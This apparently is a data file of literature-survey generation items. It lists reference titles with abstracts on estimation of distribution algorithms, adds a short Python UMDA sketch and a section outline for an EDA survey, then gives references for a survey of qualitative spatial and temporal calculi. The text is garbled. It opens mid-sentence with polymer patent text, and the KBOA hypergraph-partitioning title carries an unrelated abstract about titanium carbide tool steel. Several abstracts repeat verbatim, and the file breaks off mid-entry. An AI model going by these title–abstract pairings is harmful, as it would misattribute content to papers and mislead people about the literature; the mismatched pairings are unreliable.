concentration of repeating units in the peroxide curable polydiorganosiloxane is within specified limits. --- paper_title: Hierarchical Bayesian optimization algorithm: toward a new generation of evolutionary algorithms paper_content: Over the last few decades, genetic and evolutionary algorithms (GEAs) have been successfully applied to many problems of business, engineering, and science. This paper discusses probabilistic model-building genetic algorithms (PMBGAs), which are among the most important directions of current GEA research. PMBGAs replace traditional variation operators of GEAs by learning and sampling a probabilistic model of promising solutions. The paper describes two advanced PMBGAs: the Bayesian optimization algorithm (BOA), and the hierarchical BOA (hBOA). 
The paper argues that BOA and hBOA can solve an important class of nearly decomposable and hierarchical problems in a quadratic or subquadratic number of function evaluations with respect to the number of decision variables. --- paper_title: Using Previous Models to Bias Structural Learning in the Hierarchical BOA paper_content: Estimation of distribution algorithms (EDAs) are stochastic optimization techniques that explore the space of potential solutions by building and sampling explicit probabilistic models of promising candidate solutions. While the primary goal of applying EDAs is to discover the global optimum or at least its accurate approximation, besides this, any EDA provides us with a sequence of probabilistic models, which in most cases hold a great deal of information about the problem. Although using problem-specific knowledge has been shown to significantly improve performance of EDAs and other evolutionary algorithms, this readily available source of problem-specific information has been practically ignored by the EDA community. This paper takes the first step toward the use of probabilistic models obtained by EDAs to speed up the solution of similar problems in the future. More specifically, we propose two approaches to biasing model building in the hierarchical Bayesian optimization algorithm (hBOA) based on knowledge automatically learned from previous hBOA runs on similar problems. We show that the proposed methods lead to substantial speedups and argue that the methods should work well in other applications that require solving a large number of problems with similar structure. --- paper_title: A problem - knowledge based evolutionary algorithm KBOA for hypergraph partitioning paper_content: A sintered titanium carbide tool steel composition is provided comprising by weight about 15% to 40% primary grains of titanium carbide dispersed through a steel matrix making up the balance, the composition of said steel matrix consisting essentially by weight of about 3% to 7% chromium, about 2% to 6% molybdenum, about 2% to 8% nickel, about 0.2% to 0.6% carbon and the balance essentially iron. --- paper_title: Convergence Theory and Applications of the Factorized Distribution Algorithm paper_content: The paper investigates the optimization of additively decomposable functions (ADF) by a new evolutionary algorithm called Factorized Distribution Algorithm (FDA). FDA is based on a factorization of the distribution to generate search points. First separable ADFs are considered. These are mapped to generalized linear functions with metavariables defined for multiple alleles. The mapping transforms FDA into a Univariate Marginal Frequency Algorithm (UMDA). For UMDA the exact equation for the response to selection is computed under the assumption of proportionate selection. For truncation selection an approximate equation for the time to convergence is used, derived from an analysis of the OneMax function. FDA is also numerically investigated for non-separable functions. The time to convergence is very similar to separable ADFs. FDA outperforms the genetic algorithm with recombination of strings by far. --- paper_title: The gambler's ruin problem, genetic algorithms, and the sizing of populations paper_content: The paper presents a model for predicting the convergence quality of genetic algorithms. The model incorporates previous knowledge about decision making in genetic algorithms and the initial supply of building blocks in a novel way.
The result is an equation that accurately predicts the quality of the solution found by a GA using a given population size. Adjustments for different selection intensities are considered and computational experiments demonstrate the effectiveness of the model. --- paper_title: On The Supply Of Building Blocks paper_content: This study addresses the issue of building-block supply in the initial population. Facetwise models for supply of a single building block as well as for supply of all schemata in a partition have been developed. An estimate for the population size required to ensure the presence of all raw building blocks has been derived using these facetwise models. The facetwise models and the population-sizing estimate are verified with computational results. --- paper_title: Population sizing for entropy-based model building in discrete estimation of distribution algorithms paper_content: This paper proposes a population-sizing model for entropy-based model building in discrete estimation of distribution algorithms. Specifically, the population size required for building an accurate model is investigated. The effect of selection pressure on population sizing is also preliminarily incorporated. The proposed model indicates that the population size required for building an accurate model scales as Θ(m log m), where m is the number of substructures of the given problem and is proportional to the problem size. Experiments are conducted to verify the derivations, and the results agree with the proposed model. --- paper_title: Genetic Algorithms, Noise, and the Sizing of Populations paper_content: This paper considers the effect of stochasticity on the quality of convergence of genetic algorithms (GAs). In many problems, the variance of building-block fitness or so-called collateral noise is the major source of variance, and a population-sizing equation is derived to ensure that average signal-to-collateral-noise ratios are favorable to the discrimination of the best building blocks required to solve a problem of bounded deception. The sizing relation is modified to permit the inclusion of other sources of stochasticity, such as the noise of selection, the noise of genetic operators, and the explicit noise or nondeterminism of the objective function. In a test suite of five functions, the sizing relation proves to be a conservative predictor of average correct convergence, as long as all major sources of noise are considered in the sizing calculation. These results suggest how the sizing equation may be viewed as a coarse delineation of a boundary between what a physicist might call two distinct phases of GA behavior. At low population sizes the GA makes many errors of decision, and the quality of convergence is largely left to the vagaries of chance or the serial fixup of flawed results through mutation or other serial injection of diversity. At large population sizes, GAs can reliably discriminate between good and bad building blocks, and parallel processing and recombination of building blocks lead to quick solution of even difficult deceptive problems. 
Additionally, the paper outlines a number of extensions to this work, including the development of more refined models of the relation between generational average error and ultimate convergence quality, the development of online methods for sizing populations via the estimation of population-sizing parameters, and the investigation of population sizing in the context of niching and other schemes designed for use in problems with high cardinality solution sets. The paper also discusses how these results may one day lead to rigorous proofs of convergence for recombinative GAs operating on problems of bounded deception. --- paper_title: Scalability of the Bayesian optimization algorithm paper_content: To solve a wide range of different problems, the research in black-box optimization faces several important challenges. One of the most important challenges is the design of methods capable of automatic discovery and exploitation of problem regularities to ensure efficient and reliable search for the optimum. This paper discusses the Bayesian optimization algorithm (BOA), which uses Bayesian networks to model promising solutions and sample new candidate solutions. Using Bayesian networks in combination with population-based genetic and evolutionary search allows BOA to discover and exploit regularities in the form of a problem decomposition. The paper analyzes the applicability of the methods for learning Bayesian networks in the context of genetic and evolutionary search and concludes that the combination of the two approaches yields robust, efficient, and accurate search. --- paper_title: Enhancing the Performance of Maximum-Likelihood Gaussian EDAs Using Anticipated Mean Shift paper_content: Many Estimation-of-Distribution Algorithms use maximum-likelihood (ML) estimates. For discrete variables this has met with great success. For continuous variables the use of ML estimates for the normal distribution does not directly lead to successful optimization in most landscapes. It was previously found that an important reason for this is the premature shrinking of the variance at an exponential rate. Remedies were subsequently successfully formulated, i.e., Adaptive Variance Scaling (AVS) and Standard-Deviation Ratio triggering (SDR). Here we focus on a second source of inefficiency that is not removed by existing remedies. We then provide a simple but effective technique called Anticipated Mean Shift (AMS) that removes this inefficiency. --- paper_title: Drift and Scaling in Estimation of Distribution Algorithms paper_content: This paper considers a phenomenon in Estimation of Distribution Algorithms (EDAs) analogous to drift in population genetic dynamics. Finite population sampling in selection results in fluctuations which get reinforced when the probability model is updated. As a consequence, any probability model which can generate only a single set of values with probability 1 can be an attractive fixed point of the algorithm. To avoid this, parameters of the algorithm must scale with the system size in strongly problem-dependent ways, or the algorithm must be modified. This phenomenon is shown to hold for general EDAs as a consequence of the lack of ergodicity and irreducibility of the Markov chain on the state of probability models. It is illustrated in the case of UMDA, in which it is shown that the global optimum is only found if the population size is sufficiently large.
For the needle-in-a-haystack problem, the population size must scale as the square-root of the size of the search space. For the one-max problem, the population size must scale as the square-root of the problem size. --- paper_title: iBOA: The Incremental Bayesian Optimization Algorithm paper_content: This paper proposes the incremental Bayesian optimization algorithm (iBOA), which modifies standard BOA by removing the population of solutions and using incremental updates of the Bayesian network. iBOA is shown to be able to learn and exploit unrestricted Bayesian networks using incremental techniques for updating both the structure as well as the parameters of the probabilistic model. This represents an important step toward the design of competent incremental estimation of distribution algorithms that can solve difficult nearly decomposable problems scalably and reliably. --- paper_title: Space Complexity of Estimation of Distribution Algorithms paper_content: In this paper, we investigate the space complexity of the Estimation of Distribution Algorithms (EDAs), a class of sampling-based variants of the genetic algorithm. By analyzing the nature of EDAs, we identify criteria that characterize the space complexity of two typical implementation schemes of EDAs, the factorized distribution algorithm and Bayesian network-based algorithms. Using random additive functions as the prototype, we prove that the space complexity of the factorized distribution algorithm and Bayesian network-based algorithms is exponential in the problem size even if the optimization problem has a very sparse interaction structure. --- paper_title: Model Accuracy in the Bayesian Optimization Algorithm paper_content: Evolutionary algorithms (EAs) are particularly suited to solve problems for which there is not much information available. From this standpoint, estimation of distribution algorithms (EDAs), which guide the search by using probabilistic models of the population, have brought a new view to evolutionary computation. While solving a given problem with an EDA, the user has access to a set of models that reveal probabilistic dependencies between variables, an important source of information about the problem. However, as the complexity of the models used increases, the chance of overfitting, and consequently of reduced model interpretability, increases as well. This paper investigates the relationship between the probabilistic models learned by the Bayesian optimization algorithm (BOA) and the underlying problem structure. The purpose of the paper is threefold. First, model building in BOA is analyzed to understand how the problem structure is learned. Second, it is shown how the selection operator can lead to model overfitting in Bayesian EDAs. Third, the scoring metric that guides the search for an adequate model structure is modified to take into account the non-uniform distribution of the mating pool generated by tournament selection. Overall, this paper makes a contribution towards understanding and improving model accuracy in BOA, providing more interpretable models to assist efficiency enhancement techniques and human researchers. --- paper_title: Spurious dependencies and EDA scalability paper_content: Numerous studies have shown that advanced estimation of distribution algorithms (EDAs) often discover spurious (unnecessary) dependencies. Nonetheless, little prior work has studied the effects of spurious dependencies on EDA performance.
This paper examines the effects of spurious dependencies on the performance and scalability of EDAs with the main focus on EDAs with marginal product models and the onemax problem. A theoretical model is proposed to analyze the effects of spurious dependencies on the population sizing in EDAs and the theory is verified with experiments. The effects of spurious dependencies on the number of generations are studied empirically. The effects of replacement strategies on the performance of EDAs with spurious linkage are also investigated. --- paper_title: Analyzing Probabilistic Models in Hierarchical BOA paper_content: The hierarchical Bayesian optimization algorithm (hBOA) can solve nearly decomposable and hierarchical problems of bounded difficulty in a robust and scalable manner by building and sampling probabilistic models of promising solutions. This paper analyzes probabilistic models in hBOA on four important classes of test problems: concatenated traps, random additively decomposable problems, hierarchical traps and two-dimensional Ising spin glasses with periodic boundary conditions. We argue that although the probabilistic models in hBOA can encode complex probability distributions, analyzing these models is relatively straightforward and the results of such analyses may provide practitioners with useful information about their problems. The results show that the probabilistic models in hBOA closely correspond to the structure of the underlying optimization problem, the models do not change significantly in consequent iterations of BOA, and creating adequate probabilistic models by hand is not straightforward even with complete knowledge of the optimization problem. ---
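Several of the abstracts above refer to UMDA and to the onemax benchmark: the FDA convergence analysis maps separable problems onto UMDA, and the drift study uses UMDA to show that too small a population leads to fixation away from the optimum. As a purely illustrative sketch, the following Python implements UMDA with truncation selection on onemax; the function name, parameter values, and selection fraction are my own assumptions and are not taken from any of the cited papers.

```python
import random

def umda_onemax(n_bits=50, pop_size=200, trunc=0.5, generations=100, seed=0):
    """Minimal UMDA: keep one Bernoulli marginal per bit, sample a population,
    keep the best `trunc` fraction (truncation selection), and re-estimate
    the marginals by maximum likelihood from the selected individuals."""
    rng = random.Random(seed)
    p = [0.5] * n_bits                     # initial univariate model
    best = 0
    for _ in range(generations):
        pop = [[1 if rng.random() < pi else 0 for pi in p] for _ in range(pop_size)]
        pop.sort(key=sum, reverse=True)    # onemax fitness = number of ones
        best = max(best, sum(pop[0]))
        selected = pop[: int(trunc * pop_size)]
        p = [sum(ind[i] for ind in selected) / len(selected) for i in range(n_bits)]
        if best == n_bits:                 # optimum found
            break
    return p, best

if __name__ == "__main__":
    model, best = umda_onemax()
    print(best)   # typically reaches n_bits for a sufficiently large population
```

Rerunning the sketch with a much smaller pop_size (e.g., 10) typically makes the drift effect described in the abstract above visible: some marginals fix at 0 and the optimum is no longer found.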
Title: An Introduction and Survey of Estimation of Distribution Algorithms
Section 1: Introduction
Description 1: This section provides an overview of Estimation of Distribution Algorithms (EDAs) and their applications.
Section 2: Estimation of Distribution Algorithms
Description 2: This section explains the basic concepts of EDAs and how they work.
Section 3: General EDA Procedure
Description 3: This section outlines the general procedure for implementing EDAs, including algorithm steps and important concepts.
Section 4: Solving Onemax with a Simple EDA
Description 4: This section illustrates the basic EDA procedure using the onemax problem as an example.
Section 5: EDA Overview
Description 5: This section provides a broad overview of different types of EDAs, categorized by the type of distributions they encode.
Section 6: Discrete Variables
Description 6: This section covers EDAs that work on fixed-length strings of a finite cardinality, including different models that capture interactions between variables.
Section 7: Permutation EDAs
Description 7: This section discusses EDAs designed for problems where candidate solutions are represented by permutations, such as the traveling salesman problem.
Section 8: Real-Valued Vectors
Description 8: This section addresses EDAs applicable to optimization problems represented by real-valued vectors and their approaches, including direct representation.
Section 9: EDA-GP
Description 9: This section reviews EDAs designed for genetic programming (GP), focusing on challenges and successful implementations.
Section 10: Multi-Objective EDAs
Description 10: This section discusses EDAs developed for solving multi-objective optimization problems and methods for finding Pareto optimal solutions.
Section 11: Related Algorithms
Description 11: This section compares EDAs with other closely related stochastic optimization algorithms and techniques.
Section 12: Advantages and Disadvantages of Using EDAs
Description 12: This section reviews the main advantages and disadvantages of using EDAs compared to other metaheuristics.
Section 13: Efficiency Enhancement Techniques for EDAs
Description 13: This section outlines various techniques to enhance efficiency in EDAs, including parallelization, hybridization, and evaluation relaxation.
Section 14: EDA Theory
Description 14: This section covers theoretical aspects of EDAs, including convergence proofs, population sizing, diversity loss, memory complexity, and model accuracy.
Section 15: Additional Information
Description 15: This section provides pointers to additional sources of information on EDAs, including software, journals, and conferences.
Section 16: Summary and Conclusions
Description 16: This section summarizes the capabilities and strengths of EDAs and concludes with the potential of these algorithms in solving complex optimization problems.
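The gambler's-ruin and noise-based sizing abstracts listed above both relate the required population size to building-block signal, collateral noise, and an acceptable failure probability. As a worked illustration, the sketch below evaluates the approximate closed form that is commonly quoted for the gambler's-ruin model; the exact expression and its constants should be checked against the original paper, and the numeric inputs are arbitrary assumptions chosen only to show how the quantities enter the formula.

```python
import math

def gamblers_ruin_population_size(k, m, sigma_bb, d, alpha=0.01):
    """Commonly quoted approximation of the gambler's-ruin sizing model:
        n ~ 2^(k-1) * ln(1/alpha) * sigma_bb * sqrt(pi * (m - 1)) / d
    k        : order (size) of a building block
    m        : number of building blocks in the problem
    sigma_bb : building-block fitness standard deviation (collateral noise)
    d        : signal difference between the best and second-best building block
    alpha    : acceptable probability of deciding wrongly in a partition
    """
    return 2 ** (k - 1) * math.log(1.0 / alpha) * sigma_bb * math.sqrt(math.pi * (m - 1)) / d

# Illustrative (assumed) values: order-4 building blocks, 10 blocks, sigma_bb/d = 1.5.
print(round(gamblers_ruin_population_size(k=4, m=10, sigma_bb=1.5, d=1.0)))  # ~294
```

The point of the exercise is the scaling behaviour rather than the absolute numbers: the required size grows with the noise-to-signal ratio sigma_bb/d and with the square root of the number of competing partitions, which is the relationship the sizing abstracts above emphasize.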
A Survey of Qualitative Spatial and Temporal Calculi: Algebraic and Computational Properties
32
--- paper_title: A survey of qualitative spatial representations paper_content: Representation and reasoning with qualitative spatial relations is an important problem in artificial intelligence and has wide applications in the fields of geographic information system, computer vision, autonomous robot navigation, natural language understanding, spatial databases and so on. The reasons for this interest in using qualitative spatial relations include cognitive comprehensibility, efficiency and computational facility. This paper summarizes progress in qualitative spatial representation by describing key calculi representing different types of spatial relationships. The paper concludes with a discussion of current research and glimpse of future work. --- paper_title: Qualitative Spatial Reasoning with Cardinal Directions paper_content: Following reviews of previous approaches to spatial reasoning, a completely qualitative method for reasoning about cardinal directions, without recourse to analytical procedures, is introduced and a method is presented for a formal comparison with quantitative formulae. We use an algebraic method to formalize the meaning of cardinal directions. The standard directional symbols (N, S, E, W) are extended with a symbol 0 to denote an undecided case, which greatly increases the power of inference. Two examples of systems to determine and reason with cardinal directions are discussed in some detail and results from a prototype are given. The deduction rules for the coordination of directional symbols are formalized as equations; for inclusion in an expert system they can be coded as a look-up table (given in the text). The conclusions offer some direction for future work. --- paper_title: Reasoning about binary topological relations paper_content: A new formalism is presented to reason about topological relations. It is applicable as a foundation for an algebra over topological relations. The formalism is based upon the nine intersections of boundaries, interiors, and complements between two objects. Properties of topological relations are determined by analyzing the nine intersections to detect, for instance, symmetric topological relations and pairs of converse topological relations. Based upon the standard rules for the transitivity of set inclusion, the intersections of the composition of two binary topological relations are determined. These intersections are then matched with the intersections of the eight fundamental topological relations, giving an interpretation to the composition of topological relations. --- paper_title: Modeling Spatial Knowledge paper_content: A person's cognitive map, or knowledge of large-scale space, is built up from observations gathered as he travels through the environment. It acts as a problem solver to find routes and relative positions, as well as describing the current location. The TOUR model captures the multiple representations that make up the cognitive map, the problem-solving strategies it uses, and the mechanisms for assimilating new information. The representations have rich collections of states of partial knowledge, which support many of the performance characteristics of common-sense knowledge. --- paper_title: Qualitative spatial reasoning about distances and directions in geographic space paper_content: Abstract Most known methods for spatial reasoning translate a spatial problem into an analytical formulation in order to solve it quantitatively. 
This paper describes a method for formal, qualitative reasoning about distances and cardinal directions in geographic space. The problem addressed is how to deduce the distance and direction from point A to C, given the distance and direction from A to B and B to C. We use an algebraic approach, discussing the manipulation of distance and direction symbols (e.g. ‘N’, ‘E’, ‘S’ and ‘W’, or ‘Far’ and ‘Close’) and define two operations, composition and inverse , applied to them. After a review of other approaches, the desirable properties of deduction rules for distance and direction values are analyzed. This includes an algebraic specification of the ‘path’ image schema, from which most of the properties of distance and direction manipulation follow. Specific systems for composition of distance are explored. For directions, a formalization of the well-known triangular concept of directions (here called cone-shaped directions) and an alternative projection-based concept are explored. The algebraic approach leads to the completion of distance or direction symbols with an identity element, standing for the direction or distance from a point to itself. The so completed axiom system allows deductions, at least ‘Euclidean-approximate’, for any combination of input values. --- paper_title: The Psychological Validity of Qualitative Spatial Reasoning in One Dimension paper_content: One of the central questions of spatial reasoning research is whether the underlying processes are inherently visual, spatial, or logical. We applied the dual task interference paradigm to spatial reasoning problems in one dimension, using Allen's interval calculus, in order to make progress towards resolving this argument. Our results indicate that spatial reasoning with interval relations is largely based on the construction and inspection of qualitative spatial representations, or mental models, while no evidence for logical proofs of derivations or the involvement of visual representations and processes was found. --- paper_title: Current topics in qualitative reasoning paper_content: In this editorial introduction to this special issue of AI Magazine on qualitative reasoning, we briefly discuss the main motivations and characteristics of this branch of AI research. We also summarize the contributions in this issue and point out challenges for future research. --- paper_title: GIS, a computing perspective paper_content: INTRODUCTION What is a GIS? 
GIS Functionality Data and Databases Hardware Support FUNDAMENTAL DATABASE CONCEPTS Introduction to Databases Relational Databases Database Development Object-Orientation FUNDAMENTAL SPATIAL CONCEPTS Euclidean Space Set-Based Geometry of Space Topology of Space Network Spaces Metric Spaces Endnote on Fractal Geometry MODELS OF GEOSPATIAL INFORMATION Modeling and Ontology The Modeling Process Field-Based Models Object-Based Models REPRESENTATION AND ALGORITHMS Computing with Geospatial Data The Discrete Euclidean Plane The Spatial Object Domain Representations of Field-Based Models Fundamental Geometric Algorithms Vectorization and Rasterization Network Representation and Algorithms STRUCTURES AND ACCESS METHODS General Database Structures and Access Methods From One to Two Dimensions Raster Structures Point Object Structures Linear Objects Collections of Objects Spherical Data Structures ARCHITECTURES Hybrid, Integrated, and Composable Architectures Syntactic and Semantic Heterogeneity Distributed Systems Distributed Databases Location-Aware Computing INTERFACES Human-Computer Interaction Cartographic Interfaces Geovisualization Developing GIS Interfaces SPATIAL REASONING AND UNCERTAINTY Formal Aspects of Spatial Reasoning Information and Uncertainty Qualitative Approaches to Uncertainty Quantitative Approaches to Uncertainty Applications of Uncertainty in GIS TIME Introduction: A Brief History of Time Temporal Information Systems Spatiotemporal Information Systems Indexes and Queries Appendices --- paper_title: Exploiting qualitative spatial reasoning for topological adjustment of spatial data paper_content: Formal models of spatial relations such as the 9-Intersection model or RCC-8 have become omnipresent in the spatial information sciences and play an important role to formulate constraints in many applications of spatial data processing. A fundamental problem in such applications is to adapt geometric data to satisfy certain relational constraints while minimizing the changes that need to be made to the data. We address the problem of adjusting geometric objects to meet the spatial relations from a qualitative spatial calculus, forming a bridge between the areas of qualitative spatial representation and reasoning (QSR) and of geometric adjustment using optimization approaches. In particular, we explore how constraint-based QSR techniques can be beneficially employed to improve the optimization process. We discuss three different ways in which QSR can be utilized and then focus on its application to reduce the complexity of the optimization problem in terms of variables and equations needed. We propose two constraint-based problem simplification algorithms and evaluate them experimentally. Our results demonstrate that exploiting QSR techniques indeed leads to a significant performance improvement. --- paper_title: Qualitative spatial and temporal reasoning with AND/OR linear programming paper_content: This paper explores the use of generalized linear programming techniques to tackle two long-standing problems in qualitative spatio-temporal reasoning: Using LP as a unifying basis for reasoning, one can jointly reason about relations from different qualitative calculi. Also, concrete entities (fixed points, regions fixed in shape and/or position, etc.) can be mixed with free variables. Both features are important for applications but cannot be handled by existing techniques. In this paper we discuss properties of encoding constraint problems involving spatial and temporal relations. 
We advocate the use of AND/OR graphs to facilitate efficient reasoning and we show feasibility of our approach. --- paper_title: On Redundant Topological Constraints paper_content: The Region Connection Calculus (RCC) is a well-known calculus for representing part-whole and topological relations. It plays an important role in qualitative spatial reasoning, geographical information science, and ontology. The computational complexity of reasoning with RCC has been investigated in depth in the literature. Most of these works focus on the consistency of RCC constraint networks. In this paper, we consider the important problem of redundant RCC constraints. For a set Γ of RCC constraints, we say a constraint (x R y) in Γ is redundant if it can be entailed by the rest of Γ. A prime network of Γ is a subset of Γ which contains no redundant constraints but has the same solution set as Γ. It is natural to ask how to compute a prime network, and when it is unique. In this paper, we show that this problem is in general co-NP hard, but becomes tractable if Γ is over a tractable subclass of RCC. If S is a tractable subclass in which weak composition distributes over non-empty intersections, then we can show that Γ has a unique prime network, which is obtained by removing all redundant constraints from Γ. As a byproduct, we identify a sufficient condition for a path-consistent network being minimal. --- paper_title: On the Minimal Labeling Problem of Temporal and Spatial Qualitative Constraints paper_content: Spatial and temporal reasoning is a crucial task for certain Artificial Intelligence applications. In this context, and since two decades, various formalisms representing the information through qualitative constraint networks (QCN) have been proposed. Given a QCN, the main two problems that are facing researchers are: deciding whether this QCN is consistent or not, and, the minimal labeling problem. In this paper, we propose an efficient algorithm aiming at solving the minimal labeling problem. This algorithm is based on subclasses of relations for which the property of-consistency implies the minimality of the QCN. --- paper_title: Towards a declarative spatial reasoning system paper_content: We present early results on the development of a declarative spatial reasoning system within the context of the Constraint Logic Programming (CLP) framework. The system is capable of modelling and reasoning about qualitative spatial relations pertaining to multiple spatial domains, i.e., one or more aspects of space such as topology, and intrinsic and extrinsic orientation. It provides a seamless mechanism for combining formal qualitative spatial calculi within one framework, and provides a Prolog-based declarative interface for AI applications to abstract and reason about quantitative, geometric information in a qualitative manner. Based on previous work concerning the formalisation of the framework [2], we present ongoing work to develop the theoretical result into a comprehensive reasoning system (and Prolog-based library) which may be used independently, or as a logic-based module within hybrid intelligent systems. --- paper_title: Qualitative Spatial Representation and Reasoning with the Region Connection Calculus paper_content: This paper surveys the work of the qualitative spatial reasoning group at the University of Leeds. The group has developed a number of logical calculi for representing and reasoning with qualitative spatial relations over regions. 
We motivate the use of regions as the primary spatial entity and show how a rich language can be built up from surprisingly few primitives. This language can distinguish between convex and a variety of concave shapes and there is also an extension which handles regions with uncertain boundaries. We also present a variety of reasoning techniques, both for static and dynamic situations. A number of possible application areas are briefly mentioned. --- paper_title: Qualitative Spatial Reasoning about Sketch Maps paper_content: Sketch maps are an important spatial representation used in many geospatial-reasoning tasks. This article describes techniques we have developed that enable software to perform humanlike reasoning about sketch maps. We illustrate the utility of these techniques in the context of nuSketch Battlespace, a research system that has been successfully used in a variety of experiments. After an overview of the nuSketch approach and nuSketch Battlespace, we outline the representations of glyphs and sketches and the nuSketch spatial reasoning architecture. We describe the use of qualitative topology and Voronoi diagrams to construct spatial representations, and explain how these facilities are combined with analogical reasoning to provide a simple form of enemy intent hypothesis generation. --- paper_title: Realizing RCC8 networks using convex regions paper_content: RCC8 is a popular fragment of the region connection calculus, in which qualitative spatial relations between regions, such as adjacency, overlap and parthood, can be expressed. While RCC8 is essentially dimensionless, most current applications are confined to reasoning about two-dimensional or three-dimensional physical space. In this paper, however, we are mainly interested in conceptual spaces, which typically are high-dimensional Euclidean spaces in which the meaning of natural language concepts can be represented using convex regions. The aim of this paper is to analyze how the restriction to convex regions constrains the realizability of networks of RCC8 relations. First, we identify all ways in which the set of RCC8 base relations can be restricted to guarantee that consistent networks can be convexly realized in respectively 1D, 2D, 3D, and 4D. Most surprisingly, we find that if the relation 'partially overlaps' is disallowed, all consistent atomic RCC8 networks can be convexly realized in 4D. If instead refinements of the relation 'part of' are disallowed, all consistent atomic RCC8 relations can be convexly realized in 3D. We furthermore show, among others, that any consistent RCC8 network with 2n+1 variables can be realized using convex regions in the n-dimensional Euclidean space. --- paper_title: Qualitative Spatial Reasoning with Conceptual Neighborhoods for Agent Control paper_content: Research on qualitative spatial reasoning has produced a variety of calculi for reasoning about orientation or direction relations. Such qualitative abstractions are very helpful for agent control and communication between robots and humans. Conceptual neighborhood has been introduced as a means of describing possible changes of spatial relations which e.g. allows action planning at a high level of abstraction. We discuss how the concrete neighborhood structure depends on application-specific parameters and derive corresponding neighborhood structures for the $\mathcal{OPRA}_m$ calculus. 
We demonstrate that conceptual neighborhoods allow resolution of conflicting information by model-based relaxation of spatial constraints. In addition, we address the problem of automatically deriving neighborhood structures and show how this can be achieved if the relations of a calculus can be modeled in another calculus for which the neighborhood structure is known. --- paper_title: Formal Properties of Constraint Calculi for Qualitative Spatial Reasoning paper_content: In the previous two decades, a number of qualitative constraint calculi have been developed, which are used to represent and reason about spatial configurations. A common property of almost all of these calculi is that reasoning in them can be understood as solving a binary constraint satisfaction problem over infinite domains. The main algorithmic method that is used is constraint propagation in the form of the path-consistency method. This approach can be applied to a wide range of different aspects of spatial reasoning. We describe how to make use of this representation and reasoning technique and point out the possible problems one might encounter. 1 Qualitative Spatial Representation and Reasoning Representing spatial information and reasoning about this information is an important subproblem in many applications, such as geographical information systems (GIS), natural language understanding, robot navigation, and document interpretation. Often this information is only available qualitatively, for instance when a GIS query or integrity condition has to be specified (Sharma et al., 1994). Similarly, in document interpretation, the precise size and location of layout objects is not of interest, but the relative position of these objects matters (Walischewski, 1999). A number of approaches to representing qualitative spatial information and reasoning about it are possible. A very early attempt at qualitative spatial representation and reasoning is Kuipers’ (1978) TOUR model, which addresses the navigation problem using qualitative descriptions. Other approaches aim, for instance, to capture spatial notions using first-order logic (Randell and Cohn, 1989; --- paper_title: What is a Qualitative Calculus ? A General Framework paper_content: What is a qualitative calculus? Many qualitative spatial and temporal calculi arise from a set of JEPD (jointly exhaustive and pairwise disjoint) relations: a stock example is Allen's calculus, which is based on thirteen basic relations between intervals on the time line. This paper examines the construction of such a formalism from a general point of view, in order to make apparent the formal algebraic properties of all formalisms of that type. We show that the natural algebraic object governing this kind of calculus is a non-associative algebra (in the sense of Maddux), and that the notion of weak representation is the right notion for describing most basic properties. We discuss the ubiquity of weak representations in various guises, and argue that the fundamental notion of consistency itself can best be understood in terms of consistency of one weak representation with respect to another. --- paper_title: What is a Qualitative Calculus ? A General Framework paper_content: What is a qualitative calculus? Many qualitative spatial and temporal calculi arise from a set of JEPD (jointly exhaustive and pairwise disjoint) relations: a stock example is Allen's calculus, which is based on thirteen basic relations between intervals on the time line. 
This paper examines the construction of such a formalism from a general point of view, in order to make apparent the formal algebraic properties of all formalisms of that type. We show that the natural algebraic object governing this kind of calculus is a non-associative algebra (in the sense of Maddux), and that the notion of weak representation is the right notion for describing most basic properties. We discuss the ubiquity of weak representations in various guises, and argue that the fundamental notion of consistency itself can best be understood in terms of consistency of one weak representation with respect to another. --- paper_title: What is a Qualitative Calculus ? A General Framework paper_content: What is a qualitative calculus? Many qualitative spatial and temporal calculi arise from a set of JEPD (jointly exhaustive and pairwise disjoint) relations: a stock example is Allen's calculus, which is based on thirteen basic relations between intervals on the time line. This paper examines the construction of such a formalism from a general point of view, in order to make apparent the formal algebraic properties of all formalisms of that type. We show that the natural algebraic object governing this kind of calculus is a non-associative algebra (in the sense of Maddux), and that the notion of weak representation is the right notion for describing most basic properties. We discuss the ubiquity of weak representations in various guises, and argue that the fundamental notion of consistency itself can best be understood in terms of consistency of one weak representation with respect to another. --- paper_title: The finest of its class: The natural point-based ternary calculus for qualitative spatial reasoning paper_content: In this paper, a ternary qualitative calculus ${\mathcal LR}$ for spatial reasoning is presented that distinguishes between left and right. A theory is outlined for ternary point-based calculi in which all the relations are invariant when all points are mapped by rotations, scalings, or translations (RST relations). For this purpose, we develop methods to determine arbitrary transformations and compositions of RST relations. We pose two criteria which we call practical and natural. ‘Practical' means that the relation system should be closed under transformations, compositions and intersections and have a finite base that is jointly exhaustive and pairwise disjoint. This implies that the well-known path consistency algorithm [10] can be used to conclude implicit knowledge. ‘Natural' calculi are close to our natural way of thinking because the base relations and their complements are connected. The main result of the paper is the identification of a maximally refined calculus amongst the practical natural RST calculi, which turns out to be very similar to Ligozat's flip-flop calculus. From that it follows, e.g., that there is no finite refinement of the TPCC calculus by Moratz et al that is closed under transformations, composition, and intersection. --- paper_title: On the utilization of spatial structures for cognitively plausible and efficient reasoning paper_content: The authors present an approach to representing and processing qualitative orientation information which is motivated by cognitive considerations about the knowledge acquisition process. The approach to qualitative spatial reasoning is based on directional orientation information as available through perceptual processes. 
qualitative orientations in two-dimensional space are given by the relation between a point and a vector. A basic iconic notation for spatial orientation relations which exploits the spatial structure of the domain is presented, and a variety of ways in which these relations can be manipulated and combined for spatial reasoning is explored. > --- paper_title: Formal Properties of Constraint Calculi for Qualitative Spatial Reasoning paper_content: In the previous two decades, a number of qualitative constraint calculi have been developed, which are used to represent and reason about spatial configurations. A common property of almost all of these calculi is that reasoning in them can be understood as solving a binary constraint satisfaction problem over infinite domains. The main algorithmic method that is used is constraint propagation in the form of the path-consistency method. This approach can be applied to a wide range of different aspects of spatial reasoning. We describe how to make use of this representation and reasoning technique and point out the possible problems one might encounter. 1 Qualitative Spatial Representation and Reasoning Representing spatial information and reasoning about this information is an important subproblem in many applications, such as geographical information systems (GIS), natural language understanding, robot navigation, and document interpretation. Often this information is only available qualitatively, for instance when a GIS query or integrity condition has to be specified (Sharma et al., 1994). Similarly, in document interpretation, the precise size and location of layout objects is not of interest, but the relative position of these objects matters (Walischewski, 1999). A number of approaches to representing qualitative spatial information and reasoning about it are possible. A very early attempt at qualitative spatial representation and reasoning is Kuipers’ (1978) TOUR model, which addresses the navigation problem using qualitative descriptions. Other approaches aim, for instance, to capture spatial notions using first-order logic (Randell and Cohn, 1989; --- paper_title: What is a Qualitative Calculus ? A General Framework paper_content: What is a qualitative calculus? Many qualitative spatial and temporal calculi arise from a set of JEPD (jointly exhaustive and pairwise 